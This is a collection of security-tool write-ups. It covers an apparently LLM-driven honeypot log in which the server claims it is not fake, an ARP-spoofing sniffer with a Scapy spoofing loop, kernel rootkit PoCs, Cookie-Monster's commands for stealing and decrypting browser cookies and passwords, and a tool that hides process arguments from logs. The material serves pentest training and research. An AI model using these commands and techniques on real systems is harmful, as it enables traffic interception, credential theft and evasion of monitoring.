2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

๐Ÿ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection / Description

  • Direct Syscall: Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
  • NTDLL Unhooking: Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
  • AMSI Patch: Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
  • ETW Patch: Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
  • PE Stomping: Identifies instances of PE (Portable Executable) stomping.
  • Reflective PE Loading: Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
  • Unbacked Thread Origin: Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
  • Unbacked Thread Start Address: Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
  • API hooking: Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
  • Custom Pattern Search: Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install the dependency: sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

โš ๏ธ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch the executable you want to monitor from C:\Users\admin\, the DLL will look for ioc.json at C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
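
If you want to generate entries in this format from a raw shellcode file, a short helper will do it (a minimal sketch, not part of CrimsonEDR; the eight-byte pattern length mirrors the examples above):

import json
import sys

def bytes_to_ioc(path, pattern_len=8):
    data = open(path, "rb").read()
    patterns = []
    # emit consecutive eight-byte chunks in the "0x.." string format ioc.json uses
    for i in range(0, len(data) - pattern_len + 1, pattern_len):
        chunk = data[i:i + pattern_len]
        patterns.append(["0x%02x" % b for b in chunk])
    return {"IOC": patterns}

if __name__ == "__main__":
    print(json.dumps(bytes_to_ioc(sys.argv[1]), indent=2))
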
  2. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

By: Zion3R



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0, created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

Features

  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance (see the sketch after this list).
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.
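
As an illustration of the asynchronous approach (a minimal sketch using aiohttp, not the tool's actual implementation):

import asyncio
import aiohttp

async def check(session, url):
    try:
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as resp:
            return url, resp.status
    except (aiohttp.ClientError, asyncio.TimeoutError):
        return url, None   # unreachable host or invalid response

async def main(urls):
    async with aiohttp.ClientSession() as session:
        results = await asyncio.gather(*(check(session, u) for u in urls))
        for url, status in results:
            print(f"{status or 'ERR'}  {url}")

asyncio.run(main(["https://example.com", "https://example.org"]))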

Installation

  1. Clone the repository:

git clone https://github.com/your_username/status-checker.git
cd status-checker

  2. Install dependencies:

pip install -r requirements.txt

Usage

python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.

Example:

python status_checker.py -l urls.txt -o results.txt

Preview:

License

This project is licensed under the MIT License - see the LICENSE file for details.



CSAF - Cyber Security Awareness Framework

By: Zion3R

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate the Wazuh SSL certificates

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reasons, you should first set environment variables like this:

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific labs by using one of the following profiles: all, attackdefenselab, phisinglab, breachlab, soclab.

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access the internal network with a SOCKS5 proxy

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://mail.server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default password: password)
  • http://dvwa-monitor.lab/ (default username: admin, default password: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.
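
To illustrate the ARP spoofing concept generically (a minimal Scapy sketch, not Espionage's own code; the IP addresses are placeholders, and IP forwarding must be enabled on the attacker for traffic to keep flowing):

import time
from scapy.all import ARP, send

target_ip = "192.168.1.50"    # placeholder: victim machine
gateway_ip = "192.168.1.1"    # placeholder: default gateway

# op=2 is an ARP "is-at" reply; Scapy fills in our own MAC as the source,
# so the target caches the attacker's MAC for the gateway's IP address.
while True:
    send(ARP(op=2, pdst=target_ip, psrc=gateway_ip), verbose=False)
    time.sleep(2)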


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff; however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return URLs visited by the victim (works best with sslstrip).

  9. Press Ctrl+C in order to stop the packet interception and write the output to file.

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET


Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, wrote the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




HackerInfo - Information for Web Application Security

By: Zion3R




Information for Web Application Security


Install:

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################

Usage:


Install the hackinfo library:

sudo python setup.py install
pip3 install hackinfo



C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R


A free-to-use IOC feed for various tools/malware. It started out with just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. I'm actively working on making the backend more reliable.


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted; just know that fidelity is paramount (a high true-positive/low false-positive ratio is the focus).




VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

By: Zion3R


PoCs for kernelmode rootkit techniques, for research and education. Currently focusing on Windows. All modules support 64-bit OSes only.

NOTE

Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.


Environment

All modules are tested on Windows 11 x64. To test the drivers, the following options can be used on the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. Setting Up Kernel-Mode Debugging

Each option requires Secure Boot to be disabled.

Modules

Detailed information is given in the README.md in each project's directory. All modules are tested on Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with the Load Image Notify Callback method.
BlockNewProc PoCs to block new processes with the Process Notify Callback method.
CreateToken PoCs to get a fully privileged SYSTEM token with the ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with the Object Notify Callback.
GetFullPrivs PoCs to get full privileges with the DKOM method.
GetProcHandle PoCs to get a full-access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with the Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with the DKOM method.
ProcHide PoCs to hide processes with the DKOM method.
ProcProtect PoCs to manipulate Protected Processes.
QueryModule PoCs to retrieve load address information for kernel drivers.
StealToken PoCs to perform token stealing from kernelmode.

TODO

More PoCs, especially on the following topics, will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter




Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R


Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles; if one matches chrome.exe, it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles; if one matches msedge.exe, it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json files
--chromeCookiePID, if a chrome process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--chromeLoginDataPID, if a chrome process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file
--edgeCookiePID, if an edge process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--edgeLoginDataPID, if an edge process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."
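
For reference, this step is plain Base64 over the raw key bytes; a minimal equivalent sketch (the key bytes below are placeholders for the value printed by the BOF):

import base64

master_key = b"\xec\xfc"  # placeholder: paste the full raw master key bytes here
print(base64.b64encode(master_key).decode())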

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

make

To compile the exe on Windows:

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • Update decrypt.py to support Firefox, based on firepwd, and add a bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

By: Zion3R


NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


Default Cmd:


Windows Event Logs:


Using NoArgs:


Windows Event Logs:


Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.
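
To make that concrete, the sketch below (illustrative only, not part of NoArgs) reads a process's command line from this same PEB location using Python ctypes. It assumes 64-bit Windows, where ProcessParameters sits at PEB+0x20 and the CommandLine UNICODE_STRING at ProcessParameters+0x70; error handling is omitted for brevity:

import ctypes

ntdll = ctypes.WinDLL("ntdll")
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

class PBI(ctypes.Structure):
    # PROCESS_BASIC_INFORMATION, enough to reach PebBaseAddress.
    _fields_ = [("Reserved1", ctypes.c_void_p),
                ("PebBaseAddress", ctypes.c_void_p),
                ("Reserved2", ctypes.c_void_p * 2),
                ("UniqueProcessId", ctypes.c_void_p),
                ("Reserved3", ctypes.c_void_p)]

def read_peb_commandline(pid: int) -> str:
    # PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
    h = kernel32.OpenProcess(0x0400 | 0x0010, False, pid)
    pbi = PBI()
    ntdll.NtQueryInformationProcess(h, 0, ctypes.byref(pbi), ctypes.sizeof(pbi), None)

    def read(addr, size):
        buf = ctypes.create_string_buffer(size)
        kernel32.ReadProcessMemory(h, ctypes.c_void_p(addr), buf, size, None)
        return buf.raw

    params = int.from_bytes(read(pbi.PebBaseAddress + 0x20, 8), "little")
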